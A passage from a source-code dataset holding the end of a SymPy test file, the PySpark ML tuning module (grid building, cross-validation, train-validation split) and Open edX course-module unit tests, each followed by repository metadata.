assert (pi/10 + E*I).round(2).as_real_imag() == (0.31, 2.72)
assert (pi/10 + E*I).round(2) == Float(0.31, 2) + I*Float(2.72, 3)
# issue 3815
assert (I**(I + 3)).round(3) == Float('-0.208', '')*I
def test_extract_branch_factor():
assert exp_polar(2.0*I*pi).extract_branch_factor() == (1, 1)
def test_identity_removal():
assert Add.make_args(x + 0) == (x,)
assert Mul.make_args(x*1) == (x,)
def test_float_0():
assert Float(0.0) + 1 == Float(1.0)
@XFAIL
def test_float_0_fail():
assert Float(0.0)*x == Float(0.0)
assert (x + Float(0.0)).is_Add
def test_issue_3226():
ans = (b**2 + z**2 - (b*(a + b*t) + z*(c + t*z))**2/(
(a + b*t)**2 + (c + t*z)**2))/sqrt((a + b*t)**2 + (c + t*z)**2)
e = sqrt((a + b*t)**2 + (c + z*t)**2)
assert diff(e, t, 2) == ans
e.diff(t, 2) == ans
assert diff(e, t, 2, simplify=False) != ans
| bsd-3-clause | -2,231,647,852,518,754,800 | 32.378131 | 92 | 0.537793 | false |
nlalevee/spark | python/pyspark/ml/tuning.py | 6 | 26126 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import itertools
import numpy as np
from multiprocessing.pool import ThreadPool
from pyspark import since, keyword_only
from pyspark.ml import Estimator, Model
from pyspark.ml.common import _py2java
from pyspark.ml.param import Params, Param, TypeConverters
from pyspark.ml.param.shared import HasParallelism, HasSeed
from pyspark.ml.util import *
from pyspark.ml.wrapper import JavaParams
from pyspark.sql.functions import rand
__all__ = ['ParamGridBuilder', 'CrossValidator', 'CrossValidatorModel', 'TrainValidationSplit',
'TrainValidationSplitModel']
class ParamGridBuilder(object):
r"""
Builder for a param grid used in grid search-based model selection.
>>> from pyspark.ml.classification import LogisticRegression
>>> lr = LogisticRegression()
>>> output = ParamGridBuilder() \
... .baseOn({lr.labelCol: 'l'}) \
... .baseOn([lr.predictionCol, 'p']) \
... .addGrid(lr.regParam, [1.0, 2.0]) \
... .addGrid(lr.maxIter, [1, 5]) \
... .build()
>>> expected = [
... {lr.regParam: 1.0, lr.maxIter: 1, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 2.0, lr.maxIter: 1, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 1.0, lr.maxIter: 5, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 2.0, lr.maxIter: 5, lr.labelCol: 'l', lr.predictionCol: 'p'}]
>>> len(output) == len(expected)
True
>>> all([m in expected for m in output])
True
.. versionadded:: 1.4.0
"""
def __init__(self):
self._param_grid = {}
@since("1.4.0")
def addGrid(self, param, values):
"""
Sets the given parameters in this grid to fixed values.
"""
self._param_grid[param] = values
return self
@since("1.4.0")
def baseOn(self, *args):
"""
Sets the given parameters in this grid to fixed values.
Accepts either a parameter dictionary or a list of (parameter, value) pairs.
"""
if isinstance(args[0], dict):
self.baseOn(*args[0].items())
else:
for (param, value) in args:
self.addGrid(param, [value])
return self
@since("1.4.0")
def build(self):
"""
Builds and returns all combinations of parameters specified
by the param grid.
"""
keys = self._param_grid.keys()
grid_values = self._param_grid.values()
return [dict(zip(keys, prod)) for prod in itertools.product(*grid_values)]
class ValidatorParams(HasSeed):
"""
Common params for TrainValidationSplit and CrossValidator.
"""
estimator = Param(Params._dummy(), "estimator", "estimator to be cross-validated")
estimatorParamMaps = Param(Params._dummy(), "estimatorParamMaps", "estimator param maps")
evaluator = Param(
Params._dummy(), "evaluator",
"evaluator used to select hyper-parameters that maximize the validator metric")
def setEstimator(self, value):
"""
Sets the value of :py:attr:`estimator`.
"""
return self._set(estimator=value)
def getEstimator(self):
"""
Gets the value of estimator or its default value.
"""
return self.getOrDefault(self.estimator)
def setEstimatorParamMaps(self, value):
"""
Sets the value of :py:attr:`estimatorParamMaps`.
"""
return self._set(estimatorParamMaps=value)
def getEstimatorParamMaps(self):
"""
Gets the value of estimatorParamMaps or its default value.
"""
return self.getOrDefault(self.estimatorParamMaps)
def setEvaluator(self, value):
"""
Sets the value of :py:attr:`evaluator`.
"""
return self._set(evaluator=value)
def getEvaluator(self):
"""
Gets the value of evaluator or its default value.
"""
return self.getOrDefault(self.evaluator)
@classmethod
def _from_java_impl(cls, java_stage):
"""
Return Python estimator, estimatorParamMaps, and evaluator from a Java ValidatorParams.
"""
# Load information from java_stage to the instance.
estimator = JavaParams._from_java(java_stage.getEstimator())
evaluator = JavaParams._from_java(java_stage.getEvaluator())
epms = [estimator._transfer_param_map_from_java(epm)
for epm in java_stage.getEstimatorParamMaps()]
return estimator, epms, evaluator
def _to_java_impl(self):
"""
Return Java estimator, estimatorParamMaps, and evaluator from this Python instance.
"""
gateway = SparkContext._gateway
cls = SparkContext._jvm.org.apache.spark.ml.param.ParamMap
java_epms = gateway.new_array(cls, len(self.getEstimatorParamMaps()))
for idx, epm in enumerate(self.getEstimatorParamMaps()):
java_epms[idx] = self.getEstimator()._transfer_param_map_to_java(epm)
java_estimator = self.getEstimator()._to_java()
java_evaluator = self.getEvaluator()._to_java()
return java_estimator, java_epms, java_evaluator
class CrossValidator(Estimator, ValidatorParams, HasParallelism, MLReadable, MLWritable):
"""
K-fold cross validation performs model selection by splitting the dataset into a set of
non-overlapping randomly partitioned folds which are used as separate training and test datasets
e.g., with k=3 folds, K-fold cross validation will generate 3 (training, test) dataset pairs,
each of which uses 2/3 of the data for training and 1/3 for testing. Each fold is used as the
test set exactly once.
>>> from pyspark.ml.classification import LogisticRegression
>>> from pyspark.ml.evaluation import BinaryClassificationEvaluator
>>> from pyspark.ml.linalg import Vectors
>>> dataset = spark.createDataFrame(
... [(Vectors.dense([0.0]), 0.0),
... (Vectors.dense([0.4]), 1.0),
... (Vectors.dense([0.5]), 0.0),
... (Vectors.dense([0.6]), 1.0),
... (Vectors.dense([1.0]), 1.0)] * 10,
... ["features", "label"])
>>> lr = LogisticRegression()
>>> grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
>>> evaluator = BinaryClassificationEvaluator()
>>> cv = CrossValidator(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator,
... parallelism=2)
>>> cvModel = cv.fit(dataset)
>>> cvModel.avgMetrics[0]
0.5
>>> evaluator.evaluate(cvModel.transform(dataset))
0.8333...
.. versionadded:: 1.4.0
"""
numFolds = Param(Params._dummy(), "numFolds", "number of folds for cross validation",
typeConverter=TypeConverters.toInt)
@keyword_only
def __init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,
seed=None, parallelism=1):
"""
__init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,\
seed=None, parallelism=1)
"""
super(CrossValidator, self).__init__()
self._setDefault(numFolds=3, parallelism=1)
kwargs = self._input_kwargs
self._set(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,
seed=None, parallelism=1):
"""
setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,\
seed=None, parallelism=1):
Sets params for cross validator.
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
@since("1.4.0")
def setNumFolds(self, value):
"""
Sets the value of :py:attr:`numFolds`.
"""
return self._set(numFolds=value)
@since("1.4.0")
def getNumFolds(self):
"""
Gets the value of numFolds or its default value.
"""
return self.getOrDefault(self.numFolds)
def _fit(self, dataset):
est = self.getOrDefault(self.estimator)
epm = self.getOrDefault(self.estimatorParamMaps)
numModels = len(epm)
eva = self.getOrDefault(self.evaluator)
nFolds = self.getOrDefault(self.numFolds)
seed = self.getOrDefault(self.seed)
h = 1.0 / nFolds
randCol = self.uid + "_rand"
df = dataset.select("*", rand(seed).alias(randCol))
metrics = [0.0] * numModels
pool = ThreadPool(processes=min(self.getParallelism(), numModels))
for i in range(nFolds):
validateLB = i * h
validateUB = (i + 1) * h
condition = (df[randCol] >= validateLB) & (df[randCol] < validateUB)
validation = df.filter(condition).cache()
train = df.filter(~condition).cache()
def singleTrain(paramMap):
model = est.fit(train, paramMap)
# TODO: duplicate evaluator to take extra params from input
metric = eva.evaluate(model.transform(validation, paramMap))
return metric
currentFoldMetrics = pool.map(singleTrain, epm)
for j in range(numModels):
metrics[j] += (currentFoldMetrics[j] / nFolds)
validation.unpersist()
train.unpersist()
if eva.isLargerBetter():
bestIndex = np.argmax(metrics)
else:
bestIndex = np.argmin(metrics)
bestModel = est.fit(dataset, epm[bestIndex])
return self._copyValues(CrossValidatorModel(bestModel, metrics))
@since("1.4.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies creates a deep copy of
the embedded paramMap, and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newCV = Params.copy(self, extra)
if self.isSet(self.estimator):
newCV.setEstimator(self.getEstimator().copy(extra))
# estimatorParamMaps remain the same
if self.isSet(self.evaluator):
newCV.setEvaluator(self.getEvaluator().copy(extra))
return newCV
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java CrossValidator, create and return a Python wrapper of it.
Used for ML persistence.
"""
estimator, epms, evaluator = super(CrossValidator, cls)._from_java_impl(java_stage)
numFolds = java_stage.getNumFolds()
seed = java_stage.getSeed()
parallelism = java_stage.getParallelism()
# Create a new instance of this stage.
py_stage = cls(estimator=estimator, estimatorParamMaps=epms, evaluator=evaluator,
numFolds=numFolds, seed=seed, parallelism=parallelism)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java CrossValidator. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
estimator, epms, evaluator = super(CrossValidator, self)._to_java_impl()
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.CrossValidator", self.uid)
_java_obj.setEstimatorParamMaps(epms)
_java_obj.setEvaluator(evaluator)
_java_obj.setEstimator(estimator)
_java_obj.setSeed(self.getSeed())
_java_obj.setNumFolds(self.getNumFolds())
_java_obj.setParallelism(self.getParallelism())
return _java_obj
class CrossValidatorModel(Model, ValidatorParams, MLReadable, MLWritable):
"""
CrossValidatorModel contains the model with the highest average cross-validation
metric across folds and uses this model to transform input data. CrossValidatorModel
also tracks the metrics for each param map evaluated.
.. versionadded:: 1.4.0
"""
def __init__(self, bestModel, avgMetrics=[]):
super(CrossValidatorModel, self).__init__()
#: best model from cross validation
self.bestModel = bestModel
#: Average cross-validation metrics for each paramMap in
#: CrossValidator.estimatorParamMaps, in the corresponding order.
self.avgMetrics = avgMetrics
def _transform(self, dataset):
return self.bestModel.transform(dataset)
@since("1.4.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies the underlying bestModel,
creates a deep copy of the embedded paramMap, and
copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
bestModel = self.bestModel.copy(extra)
avgMetrics = self.avgMetrics
return CrossValidatorModel(bestModel, avgMetrics)
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java CrossValidatorModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
bestModel = JavaParams._from_java(java_stage.bestModel())
estimator, epms, evaluator = super(CrossValidatorModel, cls)._from_java_impl(java_stage)
py_stage = cls(bestModel=bestModel).setEstimator(estimator)
py_stage = py_stage.setEstimatorParamMaps(epms).setEvaluator(evaluator)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java CrossValidatorModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
sc = SparkContext._active_spark_context
# TODO: persist average metrics as well
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.CrossValidatorModel",
self.uid,
self.bestModel._to_java(),
_py2java(sc, []))
estimator, epms, evaluator = super(CrossValidatorModel, self)._to_java_impl()
_java_obj.set("evaluator", evaluator)
_java_obj.set("estimator", estimator)
_java_obj.set("estimatorParamMaps", epms)
return _java_obj
class TrainValidationSplit(Estimator, ValidatorParams, HasParallelism, MLReadable, MLWritable):
"""
.. note:: Experimental
Validation for hyper-parameter tuning. Randomly splits the input dataset into train and
validation sets, and uses evaluation metric on the validation set to select the best model.
Similar to :class:`CrossValidator`, but only splits the set once.
>>> from pyspark.ml.classification import LogisticRegression
>>> from pyspark.ml.evaluation import BinaryClassificationEvaluator
>>> from pyspark.ml.linalg import Vectors
>>> dataset = spark.createDataFrame(
... [(Vectors.dense([0.0]), 0.0),
... (Vectors.dense([0.4]), 1.0),
... (Vectors.dense([0.5]), 0.0),
... (Vectors.dense([0.6]), 1.0),
... (Vectors.dense([1.0]), 1.0)] * 10,
... ["features", "label"])
>>> lr = LogisticRegression()
>>> grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
>>> evaluator = BinaryClassificationEvaluator()
>>> tvs = TrainValidationSplit(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator,
... parallelism=2)
>>> tvsModel = tvs.fit(dataset)
>>> evaluator.evaluate(tvsModel.transform(dataset))
0.8333...
.. versionadded:: 2.0.0
"""
trainRatio = Param(Params._dummy(), "trainRatio", "Param for ratio between train and\
validation data. Must be between 0 and 1.", typeConverter=TypeConverters.toFloat)
@keyword_only
def __init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,
parallelism=1, seed=None):
"""
__init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,\
parallelism=1, seed=None)
"""
super(TrainValidationSplit, self).__init__()
self._setDefault(trainRatio=0.75, parallelism=1)
kwargs = self._input_kwargs
self._set(**kwargs)
@since("2.0.0")
@keyword_only
def setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,
parallelism=1, seed=None):
"""
setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,\
parallelism=1, seed=None):
Sets params for the train validation split.
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
@since("2.0.0")
def setTrainRatio(self, value):
"""
Sets the value of :py:attr:`trainRatio`.
"""
return self._set(trainRatio=value)
@since("2.0.0")
def getTrainRatio(self):
"""
Gets the value of trainRatio or its default value.
"""
return self.getOrDefault(self.trainRatio)
def _fit(self, dataset):
est = self.getOrDefault(self.estimator)
epm = self.getOrDefault(self.estimatorParamMaps)
numModels = len(epm)
eva = self.getOrDefault(self.evaluator)
tRatio = self.getOrDefault(self.trainRatio)
seed = self.getOrDefault(self.seed)
randCol = self.uid + "_rand"
df = dataset.select("*", rand(seed).alias(randCol))
condition = (df[randCol] >= tRatio)
validation = df.filter(condition).cache()
train = df.filter(~condition).cache()
def singleTrain(paramMap):
model = est.fit(train, paramMap)
metric = eva.evaluate(model.transform(validation, paramMap))
return metric
pool = ThreadPool(processes=min(self.getParallelism(), numModels))
metrics = pool.map(singleTrain, epm)
train.unpersist()
validation.unpersist()
if eva.isLargerBetter():
bestIndex = np.argmax(metrics)
else:
bestIndex = np.argmin(metrics)
bestModel = est.fit(dataset, epm[bestIndex])
return self._copyValues(TrainValidationSplitModel(bestModel, metrics))
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies creates a deep copy of
the embedded paramMap, and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newTVS = Params.copy(self, extra)
if self.isSet(self.estimator):
newTVS.setEstimator(self.getEstimator().copy(extra))
# estimatorParamMaps remain the same
if self.isSet(self.evaluator):
newTVS.setEvaluator(self.getEvaluator().copy(extra))
return newTVS
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java TrainValidationSplit, create and return a Python wrapper of it.
Used for ML persistence.
"""
estimator, epms, evaluator = super(TrainValidationSplit, cls)._from_java_impl(java_stage)
trainRatio = java_stage.getTrainRatio()
seed = java_stage.getSeed()
parallelism = java_stage.getParallelism()
# Create a new instance of this stage.
py_stage = cls(estimator=estimator, estimatorParamMaps=epms, evaluator=evaluator,
trainRatio=trainRatio, seed=seed, parallelism=parallelism)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java TrainValidationSplit. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
estimator, epms, evaluator = super(TrainValidationSplit, self)._to_java_impl()
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.TrainValidationSplit",
self.uid)
_java_obj.setEstimatorParamMaps(epms)
_java_obj.setEvaluator(evaluator)
_java_obj.setEstimator(estimator)
_java_obj.setTrainRatio(self.getTrainRatio())
_java_obj.setSeed(self.getSeed())
_java_obj.setParallelism(self.getParallelism())
return _java_obj
class TrainValidationSplitModel(Model, ValidatorParams, MLReadable, MLWritable):
"""
.. note:: Experimental
Model from train validation split.
.. versionadded:: 2.0.0
"""
def __init__(self, bestModel, validationMetrics=[]):
super(TrainValidationSplitModel, self).__init__()
#: best model from cross validation
self.bestModel = bestModel
#: evaluated validation metrics
self.validationMetrics = validationMetrics
def _transform(self, dataset):
return self.bestModel.transform(dataset)
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies the underlying bestModel,
creates a deep copy of the embedded paramMap, and
copies the embedded and extra parameters over.
And, this creates a shallow copy of the validationMetrics.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
bestModel = self.bestModel.copy(extra)
validationMetrics = list(self.validationMetrics)
return TrainValidationSplitModel(bestModel, validationMetrics)
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java TrainValidationSplitModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
# Load information from java_stage to the instance.
bestModel = JavaParams._from_java(java_stage.bestModel())
estimator, epms, evaluator = super(TrainValidationSplitModel,
cls)._from_java_impl(java_stage)
# Create a new instance of this stage.
py_stage = cls(bestModel=bestModel).setEstimator(estimator)
py_stage = py_stage.setEstimatorParamMaps(epms).setEvaluator(evaluator)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java TrainValidationSplitModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
sc = SparkContext._active_spark_context
# TODO: persst validation metrics as well
_java_obj = JavaParams._new_java_obj(
"org.apache.spark.ml.tuning.TrainValidationSplitModel",
self.uid,
self.bestModel._to_java(),
_py2java(sc, []))
estimator, epms, evaluator = super(TrainValidationSplitModel, self)._to_java_impl()
_java_obj.set("evaluator", evaluator)
_java_obj.set("estimator", estimator)
_java_obj.set("estimatorParamMaps", epms)
return _java_obj
if __name__ == "__main__":
import doctest
from pyspark.sql import SparkSession
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
spark = SparkSession.builder\
.master("local[2]")\
.appName("ml.tuning tests")\
.getOrCreate()
sc = spark.sparkContext
globs['sc'] = sc
globs['spark'] = spark
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
if failure_count:
exit(-1)
| apache-2.0 | 726,195,857,752,410,100 | 35.488827 | 100 | 0.625086 | false |
antonve/s4-project-mooc | common/lib/xmodule/xmodule/tests/test_course_module.py | 2 | 15329 | import unittest
from datetime import datetime, timedelta
from fs.memoryfs import MemoryFS
from mock import Mock, patch
import itertools
from xblock.runtime import KvsFieldData, DictKeyValueStore
import xmodule.course_module
from xmodule.modulestore.xml import ImportSystem, XMLModuleStore
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from django.utils.timezone import UTC
ORG = 'test_org'
COURSE = 'test_course'
NOW = datetime.strptime('2013-01-01T01:00:00', '%Y-%m-%dT%H:%M:00').replace(tzinfo=UTC())
class CourseFieldsTestCase(unittest.TestCase):
def test_default_start_date(self):
self.assertEqual(
xmodule.course_module.CourseFields.start.default,
datetime(2030, 1, 1, tzinfo=UTC())
)
class DummySystem(ImportSystem):
@patch('xmodule.modulestore.xml.OSFS', lambda dir: MemoryFS())
def __init__(self, load_error_modules):
xmlstore = XMLModuleStore("data_dir", source_dirs=[],
load_error_modules=load_error_modules)
course_id = SlashSeparatedCourseKey(ORG, COURSE, 'test_run')
course_dir = "test_dir"
error_tracker = Mock()
super(DummySystem, self).__init__(
xmlstore=xmlstore,
course_id=course_id,
course_dir=course_dir,
error_tracker=error_tracker,
load_error_modules=load_error_modules,
field_data=KvsFieldData(DictKeyValueStore()),
)
def get_dummy_course(start, announcement=None, is_new=None, advertised_start=None, end=None, certs='end'):
"""Get a dummy course"""
system = DummySystem(load_error_modules=True)
def to_attrb(n, v):
return '' if v is None else '{0}="{1}"'.format(n, v).lower()
is_new = to_attrb('is_new', is_new)
announcement = to_attrb('announcement', announcement)
advertised_start = to_attrb('advertised_start', advertised_start)
end = to_attrb('end', end)
start_xml = '''
<course org="{org}" course="{course}" display_organization="{org}_display" display_coursenumber="{course}_display"
graceperiod="1 day" url_name="test"
start="{start}"
{announcement}
{is_new}
{advertised_start}
{end}
certificates_display_behavior="{certs}">
<chapter url="hi" url_name="ch" display_name="CH">
<html url_name="h" display_name="H">Two houses, ...</html>
</chapter>
</course>
'''.format(
org=ORG,
course=COURSE,
start=start,
is_new=is_new,
announcement=announcement,
advertised_start=advertised_start,
end=end,
certs=certs,
)
return system.process_xml(start_xml)
class HasEndedMayCertifyTestCase(unittest.TestCase):
"""Double check the semantics around when to finalize courses."""
def setUp(self):
super(HasEndedMayCertifyTestCase, self).setUp()
system = DummySystem(load_error_modules=True)
#sample_xml = """
# <course org="{org}" course="{course}" display_organization="{org}_display" display_coursenumber="{course}_display"
# graceperiod="1 day" url_name="test"
# start="2012-01-01T12:00"
# {end}
# certificates_show_before_end={cert}>
# <chapter url="hi" url_name="ch" display_name="CH">
# <html url_name="h" display_name="H">Two houses, ...</html>
# </chapter>
# </course>
#""".format(org=ORG, course=COURSE)
past_end = (datetime.now() - timedelta(days=12)).strftime("%Y-%m-%dT%H:%M:00")
future_end = (datetime.now() + timedelta(days=12)).strftime("%Y-%m-%dT%H:%M:00")
self.past_show_certs = get_dummy_course("2012-01-01T12:00", end=past_end, certs='early_with_info')
self.past_show_certs_no_info = get_dummy_course("2012-01-01T12:00", end=past_end, certs='early_no_info')
self.past_noshow_certs = get_dummy_course("2012-01-01T12:00", end=past_end, certs='end')
self.future_show_certs = get_dummy_course("2012-01-01T12:00", end=future_end, certs='early_with_info')
self.future_show_certs_no_info = get_dummy_course("2012-01-01T12:00", end=future_end, certs='early_no_info')
self.future_noshow_certs = get_dummy_course("2012-01-01T12:00", end=future_end, certs='end')
#self.past_show_certs = system.process_xml(sample_xml.format(end=past_end, cert=True))
#self.past_noshow_certs = system.process_xml(sample_xml.format(end=past_end, cert=False))
#self.future_show_certs = system.process_xml(sample_xml.format(end=future_end, cert=True))
#self.future_noshow_certs = system.process_xml(sample_xml.format(end=future_end, cert=False))
def test_has_ended(self):
"""Check that has_ended correctly tells us when a course is over."""
self.assertTrue(self.past_show_certs.has_ended())
self.assertTrue(self.past_show_certs_no_info.has_ended())
self.assertTrue(self.past_noshow_certs.has_ended())
self.assertFalse(self.future_show_certs.has_ended())
self.assertFalse(self.future_show_certs_no_info.has_ended())
self.assertFalse(self.future_noshow_certs.has_ended())
def test_may_certify(self):
"""Check that may_certify correctly tells us when a course may wrap."""
self.assertTrue(self.past_show_certs.may_certify())
self.assertTrue(self.past_noshow_certs.may_certify())
self.assertTrue(self.past_show_certs_no_info.may_certify())
self.assertTrue(self.future_show_certs.may_certify())
self.assertTrue(self.future_show_certs_no_info.may_certify())
self.assertFalse(self.future_noshow_certs.may_certify())
class IsNewCourseTestCase(unittest.TestCase):
"""Make sure the property is_new works on courses"""
def setUp(self):
super(IsNewCourseTestCase, self).setUp()
# Needed for test_is_newish
datetime_patcher = patch.object(
xmodule.course_module, 'datetime',
Mock(wraps=datetime)
)
mocked_datetime = datetime_patcher.start()
mocked_datetime.now.return_value = NOW
self.addCleanup(datetime_patcher.stop)
@patch('xmodule.course_module.datetime.now')
def test_sorting_score(self, gmtime_mock):
gmtime_mock.return_value = NOW
day1 = '2012-01-01T12:00'
day2 = '2012-01-02T12:00'
dates = [
# Announce date takes priority over actual start
# and courses announced on a later date are newer
# than courses announced for an earlier date
((day1, day2, None), (day1, day1, None), self.assertLess),
((day1, day1, None), (day2, day1, None), self.assertEqual),
# Announce dates take priority over advertised starts
((day1, day2, day1), (day1, day1, day1), self.assertLess),
((day1, day1, day2), (day2, day1, day2), self.assertEqual),
# Later start == newer course
((day2, None, None), (day1, None, None), self.assertLess),
((day1, None, None), (day1, None, None), self.assertEqual),
# Non-parseable advertised starts are ignored in preference to actual starts
((day2, None, "Spring"), (day1, None, "Fall"), self.assertLess),
((day1, None, "Spring"), (day1, None, "Fall"), self.assertEqual),
# Partially parsable advertised starts should take priority over start dates
((day2, None, "October 2013"), (day2, None, "October 2012"), self.assertLess),
((day2, None, "October 2013"), (day1, None, "October 2013"), self.assertEqual),
# Parseable advertised starts take priority over start dates
((day1, None, day2), (day1, None, day1), self.assertLess),
((day2, None, day2), (day1, None, day2), self.assertEqual),
]
for a, b, assertion in dates:
a_score = get_dummy_course(start=a[0], announcement=a[1], advertised_start=a[2]).sorting_score
b_score = get_dummy_course(start=b[0], announcement=b[1], advertised_start=b[2]).sorting_score
print "Comparing %s to %s" % (a, b)
assertion(a_score, b_score)
start_advertised_settings = [
# start, advertised, result, is_still_default, date_time_result
('2012-12-02T12:00', None, 'Dec 02, 2012', False, u'Dec 02, 2012 at 12:00 UTC'),
('2012-12-02T12:00', '2011-11-01T12:00', 'Nov 01, 2011', False, u'Nov 01, 2011 at 12:00 UTC'),
('2012-12-02T12:00', 'Spring 2012', 'Spring 2012', False, 'Spring 2012'),
('2012-12-02T12:00', 'November, 2011', 'November, 2011', False, 'November, 2011'),
(xmodule.course_module.CourseFields.start.default, None, 'TBD', True, 'TBD'),
(xmodule.course_module.CourseFields.start.default, 'January 2014', 'January 2014', False, 'January 2014'),
]
@patch('xmodule.course_module.datetime.now')
def test_start_date_text(self, gmtime_mock):
gmtime_mock.return_value = NOW
for s in self.start_advertised_settings:
d = get_dummy_course(start=s[0], advertised_start=s[1])
print "Checking start=%s advertised=%s" % (s[0], s[1])
self.assertEqual(d.start_datetime_text(), s[2])
@patch('xmodule.course_module.datetime.now')
def test_start_date_time_text(self, gmtime_mock):
gmtime_mock.return_value = NOW
for setting in self.start_advertised_settings:
course = get_dummy_course(start=setting[0], advertised_start=setting[1])
print "Checking start=%s advertised=%s" % (setting[0], setting[1])
self.assertEqual(course.start_datetime_text("DATE_TIME"), setting[4])
def test_start_date_is_default(self):
for s in self.start_advertised_settings:
d = get_dummy_course(start=s[0], advertised_start=s[1])
self.assertEqual(d.start_date_is_still_default, s[3])
def test_display_organization(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
self.assertNotEqual(descriptor.location.org, descriptor.display_org_with_default)
self.assertEqual(descriptor.display_org_with_default, "{0}_display".format(ORG))
def test_display_coursenumber(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
self.assertNotEqual(descriptor.location.course, descriptor.display_number_with_default)
self.assertEqual(descriptor.display_number_with_default, "{0}_display".format(COURSE))
def test_is_newish(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-02-02T12:00', is_new=False)
assert(descriptor.is_newish is False)
descriptor = get_dummy_course(start='2013-02-02T12:00', is_new=True)
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-01-15T12:00')
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-03-01T12:00')
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2012-10-15T12:00')
assert(descriptor.is_newish is False)
descriptor = get_dummy_course(start='2012-12-31T12:00')
assert(descriptor.is_newish is True)
def test_end_date_text(self):
# No end date set, returns empty string.
d = get_dummy_course('2012-12-02T12:00')
self.assertEqual('', d.end_datetime_text())
d = get_dummy_course('2012-12-02T12:00', end='2014-9-04T12:00')
self.assertEqual('Sep 04, 2014', d.end_datetime_text())
def test_end_date_time_text(self):
# No end date set, returns empty string.
course = get_dummy_course('2012-12-02T12:00')
self.assertEqual('', course.end_datetime_text("DATE_TIME"))
course = get_dummy_course('2012-12-02T12:00', end='2014-9-04T12:00')
self.assertEqual('Sep 04, 2014 at 12:00 UTC', course.end_datetime_text("DATE_TIME"))
